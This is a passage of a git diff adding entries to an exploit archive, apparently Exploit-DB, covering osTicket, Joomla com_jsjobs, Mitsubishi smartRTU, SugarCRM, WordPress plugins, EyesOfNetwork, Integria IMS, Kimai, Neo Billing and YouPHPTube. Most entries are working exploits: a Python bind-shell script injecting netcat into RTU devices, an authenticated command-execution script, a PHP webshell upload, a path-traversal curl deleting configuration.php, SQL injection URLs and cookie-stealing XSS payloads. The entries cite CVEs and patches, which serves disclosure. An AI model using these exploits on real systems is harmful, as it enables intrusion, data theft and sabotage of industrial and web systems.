+- Now click on drop files here option and enter the test.html file.
+- Click on "create ticket" option
+- Login with another user(agent)
+- Now within the User Directory, go to the user under which the payload has
+been put.
+- The ticket raised with the name mentioned will be shown under the subject
+category.
+- Scroll down and the file uploaded will be present below.
+- Click on the file, and the payload gets executed which is persistent
+
+3. Reference
+
+https://github.com/osTicket/osTicket/commit/33ed106b1602f559a660a69f931a9d873685d1ba
+https://github.com/osTicket/osTicket/releases/tag/v1.12.1
+https://github.com/osTicket/osTicket/releases/tag/v1.10.7
+
+4. Solution
+
+The vulnerability has been patched by the vendor in the next release which
+is osTicket v1.10.7.
\ No newline at end of file
diff --git a/exploits/php/webapps/47225.txt b/exploits/php/webapps/47225.txt
new file mode 100644
index 000000000..6cd8c9129
--- /dev/null
+++ b/exploits/php/webapps/47225.txt
@@ -0,0 +1,51 @@
+# Exploit Title: osTicket-v1.12 Formula Injection
+# Vendor Homepage: https://osticket.com/
+# Software Link: https://osticket.com/download/
+# Exploit Author: Aishwarya Iyer
+# Contact: https://twitter.com/aish_9524
+# Website: https://about.me/aish_iyer
+# Category: webapps
+# CVE: CVE-2019-14749
+
+1. Description
+
+
+An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
+CSV (aka Formula) injection exists in the export spreadsheets
+functionality. These spreadsheets are generated dynamically from
+unvalidated or unfiltered user input in the Name and Internal Notes fields
+in the Users tab, and the Issue Summary field in the tickets tab. This
+allows other agents to download data in a .csv file format or .xls file
+format. This is used as input for spreadsheet applications such as Excel
+and OpenOffice Calc, resulting in a situation where cells in the
+spreadsheets can contain input from an untrusted source. As a result, the
+end user who is accessing the exported spreadsheet can be affected.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14749
+
+2. Proof of Concept
+
+Steps to Reproduce:
+- Login as an agent and under the "Users" section create a new user.
+- Insert the crafted payload of Formula Injection into "Name" and "Internal
+Notes" field.
+- Login as another agent and under the Users tab, click on export and then
+save the ".csv" file.
+- It is observed that the payload gets executed in excel and this leads to
+remote code execution.
+- Not just an agent, even a non-agent user has the option to edit his name
+where he can insert the malicious payload of Formula Injection.
+- The application does not sanitize the inputs here due to which when the
+agent clicks on export the payload gets executed.
+-The same issue persisted in the "Issue Summary" field in the tickets tab.
+
+3. Reference
+
+https://github.com/osTicket/osTicket/commit/99818486c5b1d8aa445cee232825418d6834f249
+https://github.com/osTicket/osTicket/releases/tag/v1.12.1
+https://github.com/osTicket/osTicket/releases/tag/v1.10.7
+
+4. Solution
+
+The vulnerability has been patched by the vendor in the next release which
+is osTicket v1.10.7.
\ No newline at end of file
diff --git a/exploits/php/webapps/47226.txt b/exploits/php/webapps/47226.txt
new file mode 100644
index 000000000..0ea48b52d
--- /dev/null
+++ b/exploits/php/webapps/47226.txt
@@ -0,0 +1,42 @@
+# Exploit Title: osTicket-v1.12 Stored XSS
+# Vendor Homepage: https://osticket.com/
+# Software Link: https://osticket.com/download/
+# Exploit Author: Aishwarya Iyer
+# Contact: https://twitter.com/aish_9524
+# Website: https://about.me/aish_iyer
+# Category: webapps
+# CVE: CVE-2019-14750
+
+1. Description
+
+An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1.
+Stored XSS exists in setup/install.php. It was observed that no input
+sanitization was provided in the firstname and lastname fields of the
+application. The insertion of malicious queries in those fields leads to
+the execution of those queries. This can further lead to cookie stealing or
+other malicious actions.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14750
+
+2. Proof of Concept
+
+Steps to Reproduce:
+- While setting up the osTicket application in the setup/install.php page
+insert the XSS payload into the first name and last name field.
+- After filling in all the other details and clicking on 'continue', it is
+observed that there is no validation for the first name and last name field
+and the malicious payload is stored and a new agent is created.
+- Login as that agent and navigate to "agents" tab where we will find the
+inserted payload in the firstname and Lastname field.
+- Click on the firstname value and see the payload gets executed
+
+3. Reference
+
+https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12
+https://github.com/osTicket/osTicket/releases/tag/v1.12.1
+https://github.com/osTicket/osTicket/releases/tag/v1.10.7
+
+4. Solution
+
+The vulnerability has been patched by the vendor in the next release which
+is osTicket v1.10.7.
\ No newline at end of file
diff --git a/exploits/php/webapps/47232.txt b/exploits/php/webapps/47232.txt
new file mode 100644
index 000000000..024465199
--- /dev/null
+++ b/exploits/php/webapps/47232.txt
@@ -0,0 +1,40 @@
+#Exploit Title: Joomla! component com_jsjobs - SQL Injection
+#Dork: inurl:"index.php?option=com_jsjobs"
+#Date: 11.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/5/download/1
+#Version: 1.2.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 296 in file site/models/cities.php
+
+   291	    function isCityExist($countryid, $stateid, $cityname){
+   292	        if (!is_numeric($countryid))
+   293	            return false;
+   294	
+   295	        $db = $this->getDBO();
+   296		$query = "SELECT id,name,latitude,longitude FROM `#__js_job_cities` WHERE countryid=" . $countryid . " AND LOWER(name) = '" . strtolower($cityname) . "'";	//!!!
+   297	
+   298	        if($stateid > 0){
+   299	            $query .= " AND stateid=".$stateid;
+   300	        }else{
+   301	            $query .= " AND (stateid=0 OR stateid IS NULL)";
+   302		}
+   303		
+   305	        $db->setQuery($query);
+   306	        $city = $db->loadObject();
+   307	        if ($city != null)
+   308	            return $city;
+   309	        else
+   310	            return false;
+   311	    }
+   312	
+   313	}
+
+#####################################
+#PoC:
+#####################################
+http://localhost/index.php?option=com_jsjobs&task=cities.savecity&citydata=%27%20UNION%20SELECT%20*%20FROM%20(SELECT%20user())%20AS%20a%20JOIN%20(SELECT%20version())%20as%20b%20JOIN%20(SELECT%20database())%20as%20c%20JOIN%20(SELECT%20%27woot%27)%20as%20d--%20,Canada
\ No newline at end of file
diff --git a/exploits/php/webapps/47234.py b/exploits/php/webapps/47234.py
new file mode 100755
index 000000000..77a6e9ca9
--- /dev/null
+++ b/exploits/php/webapps/47234.py
@@ -0,0 +1,38 @@
+#!/usr/bin/python
+
+# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
+# Date: 29 June 2019 
+# Exploit Author: (@xerubus | mogozobo.com)
+# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
+# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
+# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
+# CVE-ID: CVE-2019-14927
+# Full write-up: https://www.mogozobo.com/?p=3593
+
+import sys, os, requests, socket
+
+os.system('clear')
+
+print("""\
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/  -= Conf_Me-smartRTU  by @xerubus =-    
+|   D _]/\ \  -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+                    """)
+
+host = raw_input("Enter RTU IP address: ")
+	
+php_page = '/saveSettings.php'
+url = "http://{}{}".format(host, php_page)
+
+print "[+] Attempting to download smartRTU configuration file"
+
+r = requests.get(url)
+if r.status_code == 200:
+   print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
+   with open('smartRTU_conf.xml', 'w') as f:
+      f.write(r.content)
\ No newline at end of file
diff --git a/exploits/php/webapps/47235.py b/exploits/php/webapps/47235.py
new file mode 100755
index 000000000..cd27f151e
--- /dev/null
+++ b/exploits/php/webapps/47235.py
@@ -0,0 +1,69 @@
+#!/usr/bin/python
+
+# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
+# Date: 29 June 2019 
+# Exploit Author: (@xerubus | mogozobo.com)
+# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
+# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
+# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 
+# CVE-ID: CVE-2019-14931
+# Full write-up: https://www.mogozobo.com/?p=3593
+
+import sys, os, requests, socket
+
+os.system('clear')
+
+print("""\
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/  -= Bind_Me-smartRTU  by @xerubus =-    
+|   D _]/\ \  -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+                    """)
+
+host = raw_input("Enter RTU IP address: ")
+port = raw_input("Enter bind shell port number: ")
+	
+php_page = '/action.php'
+url = "http://{}{}".format(host, php_page)
+payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}
+
+print "\n[+] Building payload"
+print "[+] Sending payload"
+print "[+] Attempting connection to smartRTU"
+
+try:
+   r = requests.post(url, data=payload, timeout=1)
+except:
+   pass
+
+port = (int(port))
+
+try:
+   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+   s.connect((host, port))
+	
+   try :  
+      print "[+] Connected to the smartRTU!\n"
+      while 1:  
+         cmd = raw_input("(smartRTU-shell) # ");  
+         s.send(cmd + "\n");  
+         result = s.recv(1024).strip();  
+         if not len(result) :  
+            print "\n[!] Play nice now skiddies....\n\n"
+            s.close();  
+            break;  
+         print(result);  
+
+   except KeyboardInterrupt:
+      print "\n[+] ^C Received, closing connection"
+      s.close();
+   except EOFError:
+      print "\n[+] ^D Received, closing connection"
+      s.close();
+
+except socket.error:
+   print "[!] Failed to connect to bind shell."
\ No newline at end of file
diff --git a/exploits/php/webapps/47247.txt b/exploits/php/webapps/47247.txt
new file mode 100644
index 000000000..2a1a569a5
--- /dev/null
+++ b/exploits/php/webapps/47247.txt
@@ -0,0 +1,30 @@
+# Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise
+# Google Dork: N/A
+# Date: 11.08.2019
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: https://www.sugarcrm.com
+# Version: 9.0.0
+# Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76
+# CVE : 2019-14974
+
+The application fails to sanitize user input on https://sugarcrm-qms.XXX.com/mobile/error-not-supported-platform.html and reflect the input directly in the HTTP response, allowing the hacker to exploit the vulnerable parameter and have malicious content executed in the victim's browser.
+
+Steps to reproduce:
+
+1.Attacker will craft a malicious payload and create a legitimate link with the payload included;
+2. Attacker will send the link to the victim;
+3. Upon clicking on the link, the malicious payload will be reflected in the response and executed in the victim’s browser.
+
+The behavior can be observed by visiting the following URL:
+
+https://server/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms://
+
+Clicking on FULL VERSION OF WEBSITE will trigger the XSS.
+
+Impact statement:
+
+Although requiring user interaction, reflected XSS impact might range from web defacement to stealing user info and full account takeover, depending on the circumstances.
+
+Recommendation:
+
+Always ensure to validate parameters input and encode the output.
\ No newline at end of file
diff --git a/exploits/php/webapps/47249.txt b/exploits/php/webapps/47249.txt
new file mode 100644
index 000000000..aac1ac173
--- /dev/null
+++ b/exploits/php/webapps/47249.txt
@@ -0,0 +1,23 @@
+#Exploit Title: Joomla! component com_jsjobs - 'customfields.php' SQL Injection
+#Dork: inurl:"index.php?option=com_jsjobs"
+#Date: 13.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/5/download/1
+#Version: 1.2.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 171 in file site/models/customfields.php
+
+   169	    function dataForDepandantField( $val , $childfield){ 
+   170	        $db = $this->getDBO();
+   171	        $query = "SELECT userfieldparams,fieldtitle FROM `#__js_job_fieldsordering` WHERE field = '".$childfield."'";	//!!!
+   172	        $db->setQuery($query);
+   173	        $data = $db->loadObject();
+
+#####################################
+#PoC:
+#####################################
+$> sqlmap.py -u "http://localhost/index.php?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0" --random-agent --dbms=mysql --method GET -p child --technique E
\ No newline at end of file
diff --git a/exploits/php/webapps/47251.txt b/exploits/php/webapps/47251.txt
new file mode 100644
index 000000000..fa9eff0ce
--- /dev/null
+++ b/exploits/php/webapps/47251.txt
@@ -0,0 +1,51 @@
+# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
+# Google Dork: inurl:"/wp-content/plugins/download-manager
+# Date: 24 may, 2019
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://www.wpdownloadmanager.com/
+# Software Link: https://wordpress.org/plugins/download-manager/
+# Tested on: Apache/2.2.24 (CentOS)
+POC 
+
+#1 
+
+There is no CSRF nonce check performed in "POST
+/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. 
+
+#Code
+
+<form method="POST"
+action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
+<input type="hidden" name="__wpdm_email_template" value="default.html">
+<input type="hidden" name="__wpdm_email_setting[logo]"
+value="https://hacker.jpg">
+<input type="hidden" name="__wpdm_email_setting[banner]"
+value="https://hacker.jpg">
+<input type="hidden" name="__wpdm_email_setting[footer_text]"
+value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
+value="https://malicious-url.com">
+<input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
+<input type="hidden" name="__wpdm_email_setting[youtube]"
+value="https://malicious-url.com">
+<input type="submit">
+</form>
+
+#2
+
+There is no CSRF nonce check performed in "POST
+/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
+e&id=default" request.
+
+#Code
+
+<form method="POST"
+action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
+task=EditEmailTemplate&id=default">
+<input type="hidden" name="id" value="default">
+<input type="hidden" name="email_template[subject]" value="forget password">
+<input type="hidden" name="email_template[message]" value="aaa">
+<input type="hidden" name="email_template[from_name]" value="hacker">
+<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
+<input type="submit">
+</form>
\ No newline at end of file
diff --git a/exploits/php/webapps/47280.py b/exploits/php/webapps/47280.py
new file mode 100755
index 000000000..f05edf88b
--- /dev/null
+++ b/exploits/php/webapps/47280.py
@@ -0,0 +1,77 @@
+# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
+# Google Dork: N/A
+# Date: 2019-08-14
+# Exploit Author: Nassim Asrir
+# Vendor Homepage: https://www.eyesofnetwork.com/
+# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
+# Version: 5.1 < 5.0
+# Tested on: Windows 10 
+# CVE : N/A
+
+#About The Product:
+
+''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. 
+EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance. 
+EyesOfNetwork Supervision provides event management, availability, problems and capacity. 
+#Technical Analysis:
+EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
+By looking into tools/snmpwalk.php we will find the vulnerable part of code:
+else{
+	$command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
+}
+in this line we can see as the attacker who control the value of "$host_name" variable .
+And after that we have the magic function "popen" in the next part of code.
+			$handle = popen($command,'r');
+echo 		"<p>";<br />
+			while($read = fread($handle,100)){ 
+				echo nl2br($read); 
+				flush();
+			} 
+			pclose($handle);			
+And now we can see the use of "popen" function that execute the $command's value and if we set a shell metacharacters ";" in the end of the command we will be able to execute OS command.'''
+
+#Exploit
+
+import requests
+import optparse
+import sys
+import bs4 as bs
+
+commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL",
+                  )
+commandList.add_option('-c', '--cmd', action="store",
+                  help="Insert command name",
+                  )
+commandList.add_option('-u', '--user', action="store",
+                  help="Insert username",
+                  )
+commandList.add_option('-p', '--pwd', action="store",
+                  help="Insert password",
+                  )
+options, remainder = commandList.parse_args()
+ 
+if not options.target or not options.cmd or not options.user or not options.pwd:
+
+    commandList.print_help()
+    sys.exit(1)
+ 
+ 
+url = options.target
+cmd = options.cmd
+user = options.user
+pwd = options.pwd
+ 
+with requests.session() as c:
+    link=url
+    initial=c.get(link) 
+    login_data={"login":user,"mdp":pwd} 
+    page_login=c.post(str(link)+"/login.php", data=login_data) 
+v_url=link+"/module/tool_all/select_tool.php"
+v_data = {"page": "bylistbox", "host_list": "127.0.0.1;"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''}
+page_v=c.post(v_url, data=v_data)
+my=bs.BeautifulSoup(page_v.content, "lxml")
+for textarea in my.find_all('p'):
+            final = textarea.get_text()
+print final
\ No newline at end of file
diff --git a/exploits/php/webapps/47281.txt b/exploits/php/webapps/47281.txt
new file mode 100644
index 000000000..9fff46b2d
--- /dev/null
+++ b/exploits/php/webapps/47281.txt
@@ -0,0 +1,99 @@
+# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
+# Dork: inurl:"index.php?option=com_jsjobs"
+# Date: 2019-08-16
+# Exploit Author: qw3rTyTy
+# Vendor Homepage: https://www.joomsky.com/
+# Software Link: https://www.joomsky.com/5/download/1
+# Version: 1.2.6
+# Tested on: Debian/nginx/joomla 3.9.0
+
+# Vulnerability details:
+# This vulnerability is caused when processing custom userfield.
+
+File:		site/models/job.php
+Function:	storeJob
+Line:		1240
+-------------------------------------
+
+  1215	    //custom field code start
+  1216	        $customflagforadd = false;
+  1217	        $customflagfordelete = false;
+  1218	        $custom_field_namesforadd = array();
+  1219	        $custom_field_namesfordelete = array();
+  1220	        $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
+  1221	        $params = array();
+  1222	        $forfordelete = '';
+  1223	        
+  1224	        foreach ($userfield AS $ufobj) {
+  1225	            $vardata = '';
+  1226	            if($ufobj->userfieldtype == 'file'){
+  1227	                if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
+  1228	                    $vardata = $data[$ufobj->field.'_2'];
+  1229	                }else{
+  1230	                    $vardata = $_FILES[$ufobj->field]['name'];
+  1231	                }
+  1232	                $customflagforadd=true;
+  1233	                $custom_field_namesforadd[]=$ufobj->field;
+  1234	            }else{
+  1235	                $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
+  1236	            }
+  1237	            if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
+  1238	                $customflagfordelete = true;
+  1239	                $forfordelete = $ufobj->field;
+  1240	                $custom_field_namesfordelete[]= $data[$ufobj->field.'_2'];		//No check.
+  1241	            }
+  ...snip...
+  1323	        // new
+  1324	        //removing custom field 
+  1325	        if($customflagfordelete == true){
+  1326	            foreach ($custom_field_namesfordelete as $key) {
+  1327	                $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2);		//!!!
+  1328	            }
+  1329	        }
+
+File:		site/models/common.php
+Function:	uploadOrDeleteFileCustom
+Line:		851
+-------------------------------------
+
+   748	        $path = $base . '/' . $datadirectory;
+   749	        if (!file_exists($path)) { // create user directory
+   750	            $this->makeDir($path);
+   751	        }
+   752	        $isupload = false;
+   753	        $path = $path . '/data';
+   754	        if (!file_exists($path)) { // create user directory
+   755	            $this->makeDir($path);
+   756	        }
+   757	        if($for == 3 )
+   758	            $path = $path . '/jobseeker';
+   759	        else
+   760	            $path = $path . '/employer';
+   761	
+   762	        if (!file_exists($path)) { // create user directory
+   763	            $this->makeDir($path);
+   764	        }
+   ...snip...
+   843	        } else { // DELETE FILES
+   844	            if ($isdeletefile == 1) {
+   845	                if($for == 3){
+   846	                    $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
+   847	                }else{
+   848	                    $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
+   849	                }
+   850	                $file = $userpath.$field;
+   851	                unlink($file);		//!!!
+   852	            }
+   853	            return 1;
+   854	        }
+   855	    }
+
+#####################################
+#PoC:
+#####################################
+
+# If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests.
+
+$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"
+
+$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"
\ No newline at end of file
diff --git a/exploits/php/webapps/47283.txt b/exploits/php/webapps/47283.txt
new file mode 100644
index 000000000..17beee8b7
--- /dev/null
+++ b/exploits/php/webapps/47283.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload
+# Date: 2019-08-16
+# Exploit Author: Greg.Priest
+# Vendor Homepage: https://integriaims.com/
+# Software Link: https://sourceforge.net/projects/integria/files/5.0.86/
+# Version: Integria IMS 5.0.86
+# Tested on: Windows
+# CVE : N/A
+
+# ---------------------------------------------------------------------------------------
+# http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
+# ---------------------------------------------------------------------------------------
+
+# [Description]
+# filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload.
+# index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
+# ---------------------------------------------------------------------------------------
+
+POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1
+Host: 10.61.184.30
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
+Content-Type: multipart/form-data; boundary=---------------------------30333176734664
+Content-Length: 374
+Connection: close
+Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e
+Upgrade-Insecure-Requests: 1
+
+-----------------------------30333176734664
+Content-Disposition: form-data; name="curdir"
+
+
+-----------------------------30333176734664
+Content-Disposition: form-data; name="file"; filename="whoami.php"
+Content-Type: application/octet-stream
+
+<?php
+$output = shell_exec('whoami');
+echo "<pre>$output</pre>";
+?>
+
+-----------------------------30333176734664--
\ No newline at end of file
diff --git a/exploits/php/webapps/47286.txt b/exploits/php/webapps/47286.txt
new file mode 100644
index 000000000..fe5d918d6
--- /dev/null
+++ b/exploits/php/webapps/47286.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
+# Date: 07/15/2019
+# Exploit Author: osamaalaa
+# Vendor Homepage: [link]
+# Software Link: https://github.com/kevinpapst/kimai2
+# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
+# Version: 2
+
+1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create
+
+2-Add this payload "><svg/onload=alert('xss')> in the description
+
+3-Save The changes
+
+4-refresh and we have alert pop up!
+
+The Request POC :
+
+POST /index.php/en/timesheet/create HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 392
+Connection: close
+Referer: http://localhost
+Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv
+
+timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= "><svg/onload=alert('xss')>&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0
\ No newline at end of file
diff --git a/exploits/php/webapps/47289.txt b/exploits/php/webapps/47289.txt
new file mode 100644
index 000000000..da318036f
--- /dev/null
+++ b/exploits/php/webapps/47289.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
+# Date: 18.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
+# Version: 3.5
+# CWE : CWE-79
+
+[Description]
+
+# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations.
+# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability. 
+
+[Proof of Concept]
+
+# 1. Authorization  as customer (regular user account) [//host/neo/crm/user/login]
+# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
+# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid] 
+
+[Example paylods]
+
+# Example payload: "><img src="x" onerror="alert('XSS');">
+# Example payload: "><script>alert(document.cookie)</script>
+
+[POST Request]
+
+POST /neo/crm/tickets/addticket HTTP/1.1
+Host: host
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: //host/neo/crm/tickets/addticket
+Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
+Content-Length: 694
+Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
+Connection: close
+Upgrade-Insecure-Requests: 1
+ 
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="title"
+ 
+"><script>alert('XSS')</script>
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="content"
+ 
+<p>"><script>alert('XSS')</script><br></p>
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+ 
+ 
+-----------------------------899768029113033755249127523
+Content-Disposition: form-data; name="userfile"; filename=""
+Content-Type: application/octet-stream
+ 
+ 
+-----------------------------899768029113033755249127523--
\ No newline at end of file
diff --git a/exploits/php/webapps/47294.txt b/exploits/php/webapps/47294.txt
new file mode 100644
index 000000000..903f7b3b1
--- /dev/null
+++ b/exploits/php/webapps/47294.txt
@@ -0,0 +1,36 @@
+# Exploit Title: YouPHPTube < 7.3 SQL Injection
+# Google Dork: /
+# Date: 19.08.2019
+# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
+# Vendor Homepage: https://www.youphptube.com/
+# Software Link: https://github.com/YouPHPTube/YouPHPTube
+# Version: < 7.3
+# Tested on: Linux/Windows
+# CVE : CVE-2019-14430
+
+The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.
+
+Example Request:
+
+POST /objects/userCreate.json.php HTTP/1.1
+Host: vulnerablehost.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+[SomeHeaders and Cookies]
+
+user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx
+
+Methods for DB-Extraction are:
+
+
+- Boolean-based blind
+
+- Error-based
+
+- AND/OR time-based blind
+
+
+The vulnerability was fixed with this commit:
+https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a
\ No newline at end of file
diff --git a/exploits/php/webapps/47295.html b/exploits/php/webapps/47295.html
new file mode 100644
index 000000000..5948e4e44
--- /dev/null
+++ b/exploits/php/webapps/47295.html
@@ -0,0 +1,25 @@
+# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
+# Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
+# Date: 18 july, 2019
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
+# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
+# Version: 2.2.1
+# Tested on: Apache/2.2.24 (CentOS)
+# CVE : Fresh
+
+#About Plugin
+The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
+#Vulnerable Description
+WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
+## CSRF Code
